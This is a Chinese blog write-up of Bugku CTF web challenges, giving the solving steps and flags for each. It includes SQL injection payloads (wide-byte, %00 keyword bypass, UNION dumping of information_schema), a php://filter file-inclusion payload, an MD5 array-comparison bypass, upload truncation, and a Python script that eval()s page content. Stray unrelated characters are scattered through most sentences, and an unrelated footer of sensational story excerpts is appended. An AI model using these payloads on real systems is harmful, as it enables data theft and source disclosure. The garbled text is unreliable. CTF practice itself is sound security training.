Bugku-Web

Web2

最直接的辦法:F12打開控制臺凶掰,ctrl+f搜索flag關(guān)鍵字得到flag:KEY{Web-2-bugKssNNikls9100}
第二種是禁用當前頁面的JS咆霜,然后查看源碼看到flag
第三種直接在url前面加上view-source:似枕,即直接訪問view-source:http://120.24.86.145:8002/web2/也可以查看源碼

文件上傳測試

設(shè)置好瀏覽器代理用burpsuite劫持數(shù)據(jù)包

選擇好文件上傳

嘗試%00截斷

拿到flag:Flag:42e97d465f962c53df9549377b513c7e

計算題

查看源碼可知對輸入長度做了限制水评。我們進行修改

成功拿到flag:flag{CTF-bugku-0032}

web基礎(chǔ)$_GET

打開看到如下頁面艳馒,已經(jīng)告訴我們源碼

因此直接構(gòu)造payload
120.24.86.145:8002/get/?what=flag

拿到flag:flag{bugku_get_su8kej2en}

web基礎(chǔ)$_POST

打開看到源碼

這次是需要POST提交寻仗,因此用hackbar模擬

拿到flag:flag{bugku_get_ssseint67se}

矛盾

num=_GET['num'];
if(!is_numeric(num)) { echonum;
if(num==1) echo 'flag{**********}'; } 提交合法的num就能拿到flag,URL訪問:http://120.24.86.145:8002/get/index1.php?num=1'
flag:flag{bugku-789-ps-ssdf}

Web3

打開后發(fā)現(xiàn)一直彈窗昧穿,我們禁止彈窗然后查看源碼

用js寫的代碼一直彈窗勺远,底部有一串unicode字符應(yīng)該是flag

解碼后得到flag:KEY{J2sa42ahJK-HS11III}

sql注入

右鍵查看源碼

發(fā)現(xiàn)是gb2312編碼,題目是sql注入时鸵,猜測是寬字節(jié)注入
爆數(shù)據(jù)庫payload:http://103.238.227.13:10083/?id=1%df%27%20union%20select%201,database()--+

最終payload:http://103.238.227.13:10083/?id=1%df%27%20union%20select%201,string from sql5.key--+

flag:KEY{54f3320dc261f313ba712eb3f13a1f6d}

域名解析

提示很清楚胶逢,將flag.bugku.com解析到120.24.86.145即可拿到flag
因此我們修改hosts文件將flag.bugku.com解析到120.24.86.145,添加如下規(guī)則

再次訪問flag.bugku.com

拿到flag:KEY{DSAHDSJ82HDS2211}

SQL注入1

使用%00繞過關(guān)鍵字
爆出數(shù)據(jù)庫為sql3:
http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,database()%20fr%00om%20sql3.key%23
最終payload:http://103.238.227.13:10087/?id=-1 uni%00on sel%00ect 1,hash fr%00om sql3.key%23
flag:KEY{c3d3c17b4ca7f791f85e#$1cc72af274af4adef}

你必須讓他停下

BurpSuite抓包直接Repeater幾次

flag:flag{dummy_game_1s_s0_popular}

本地包含

http://120.24.86.145:8003/?hello=file(%22flag.php%22)

flag:flag{bug-ctf-gg-99}

變量1

利用超全局數(shù)組GLOBALS可以打印出所有變量
http://120.24.86.145:8004/index1.php?args=GLOBALS

flag:flag{92853051ab894a64f7865cf3c2128b34}

Web5

查看源代碼

隱藏了一段字符饰潜,查資料得知是JS代碼經(jīng)過jsfuck編碼的格式初坠,我們復(fù)制到控制臺執(zhí)行

可以看到ctf{whatfk},提示字母大寫囊拜,flag:CTF{WHATFK}

Web4

根據(jù)提示查看源代碼

可以看到這是一段JS的代碼某筐,定義了兩個變量,并且經(jīng)過了url編碼冠跷,我們用burpsuite解碼得到一段代碼

可以看到密碼為67d709b2baa648cf6e87a7114f1南誊,提交一下發(fā)現(xiàn)不對身诺,應(yīng)該是少了一部分,仔細再看看源碼發(fā)現(xiàn)要在變量p2前面加上%35%34%61%61%32再進行解碼

這才是正確的密碼

提交得到flag:KEY{J22JK-HS11}

flag在index里

看到file參數(shù)想到文件包含漏洞
payload:http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
返回的就是index.php的源代碼的base64編碼抄囚,解碼得到flag

flag:flag{edulcni_elif_lacol_si_siht}

備份是個好習(xí)慣

看到備份霉赡,首先想到源碼泄露,訪問一下http://120.24.86.145:8002/web16/index.php.bak幔托,發(fā)現(xiàn)可以下載到源碼

MD5比較繞過穴亏,只不過加了一點過濾。訪問:http://120.24.86.145:8002/web16/?kkeyey1[]=a&kkeyey2[]=b
flag:Bugku{OH_YOU_FIND_MY_MOMY}

成績單

打開看到一個表單重挑,首先想到SQL注入
爆表:-1' union select 1,table_name,3,4 from information_schema.tables where TABLE_SCHEMA='skctf_flag' LIMIT 0,1
爆字段:-1' union select 1,column_name,3,4 from information_schema.columns where TABLE_SCHEMA='skctf_flag' and table_name='fl4g' LIMIT 0,1#
爆flag:-1' union select 1,skctf_flag,3,4 from fl4g#
flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

秋名山老司機

直接用腳本計算出來然后POST提交

import re
import requests

s = requests.Session()
r = s.get("http://120.24.86.145:8002/qiumingshan/")
searchObj = re.search(r'^<div>(.*)=\?;</div>$', r.text, re.M | re.S)
d = {
"value": eval(searchObj.group(1))
}
r = s.post("http://120.24.86.145:8002/qiumingshan/", data=d)
print(r.text)

flag:Bugku{YOU_DID_IT_BY_SECOND}

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末嗓化,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子谬哀,更是在濱河造成了極大的恐慌刺覆,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,496評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件史煎,死亡現(xiàn)場離奇詭異谦屑,居然都是意外死亡,警方通過查閱死者的電腦和手機篇梭,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,407評論 3 392
  • 文/潘曉璐 我一進店門氢橙,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人恬偷,你說我怎么就攤上這事悍手。” “怎么了袍患?”我有些...
    開封第一講書人閱讀 162,632評論 0 353
  • 文/不壞的土叔 我叫張陵谓苟,是天一觀的道長。 經(jīng)常有香客問我协怒,道長,這世上最難降的妖魔是什么卑笨? 我笑而不...
    開封第一講書人閱讀 58,180評論 1 292
  • 正文 為了忘掉前任孕暇,我火速辦了婚禮,結(jié)果婚禮上赤兴,老公的妹妹穿的比我還像新娘妖滔。我一直安慰自己,他們只是感情好桶良,可當我...
    茶點故事閱讀 67,198評論 6 388
  • 文/花漫 我一把揭開白布座舍。 她就那樣靜靜地躺著,像睡著了一般陨帆。 火紅的嫁衣襯著肌膚如雪曲秉。 梳的紋絲不亂的頭發(fā)上采蚀,一...
    開封第一講書人閱讀 51,165評論 1 299
  • 那天,我揣著相機與錄音承二,去河邊找鬼榆鼠。 笑死,一個胖子當著我的面吹牛亥鸠,可吹牛的內(nèi)容都是我干的妆够。 我是一名探鬼主播,決...
    沈念sama閱讀 40,052評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼负蚊,長吁一口氣:“原來是場噩夢啊……” “哼神妹!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起家妆,我...
    開封第一講書人閱讀 38,910評論 0 274
  • 序言:老撾萬榮一對情侶失蹤鸵荠,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后揩徊,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體腰鬼,經(jīng)...
    沈念sama閱讀 45,324評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,542評論 2 332
  • 正文 我和宋清朗相戀三年塑荒,在試婚紗的時候發(fā)現(xiàn)自己被綠了熄赡。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,711評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡齿税,死狀恐怖彼硫,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情凌箕,我是刑警寧澤拧篮,帶...
    沈念sama閱讀 35,424評論 5 343
  • 正文 年R本政府宣布,位于F島的核電站牵舱,受9級特大地震影響串绩,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜芜壁,卻給世界環(huán)境...
    茶點故事閱讀 41,017評論 3 326
  • 文/蒙蒙 一礁凡、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧慧妄,春花似錦顷牌、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,668評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至饱普,卻和暖如春运挫,著一層夾襖步出監(jiān)牢的瞬間状共,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,823評論 1 269
  • 我被黑心中介騙來泰國打工滑臊, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留口芍,地道東北人。 一個月前我還...
    沈念sama閱讀 47,722評論 2 368
  • 正文 我出身青樓雇卷,卻偏偏與公主長得像鬓椭,于是被迫代替她去往敵國和親胧辽。 傳聞我的和親對象是個殘疾皇子玷或,可洞房花燭夜當晚...
    茶點故事閱讀 44,611評論 2 353

推薦閱讀更多精彩內(nèi)容

  • 我使用的是火狐瀏覽器 使用火狐瀏覽器的hackbar插件 如果有錯誤的地方希望大家多多指出,多謝多謝 WEB2 點...
    yangc隨想閱讀 54,271評論 11 16
  • WEB2 看源代碼得flag 文件上傳測試 找一張圖片上傳箱舞,截包改后綴名為.php得flag 計算題 F12修改輸...
    a2dd56f6ad89閱讀 18,509評論 0 2
  • [{"reportDate": "2018-01-23 23:28:49","fluctuateCause": n...
    加勒比海帶_4bbc閱讀 767評論 1 2
  • 滴答~滴 看名字結(jié)合題目知道是摩斯密碼贮折,解密得到 KEY{BKCTFMISC} 聰明的小羊 翻過2個柵欄裤翩,首先說明...
    皮一下怎么了閱讀 930評論 0 0
  • 最近過的日子和打仗似的,混沌剛?cè)雽W(xué)调榄,007剛開始踊赠,每天還要日更,還要工作每庆,如此分裂的人生筐带,到底是為了更優(yōu)秀,還是把...
    秦家炎閱讀 119評論 0 0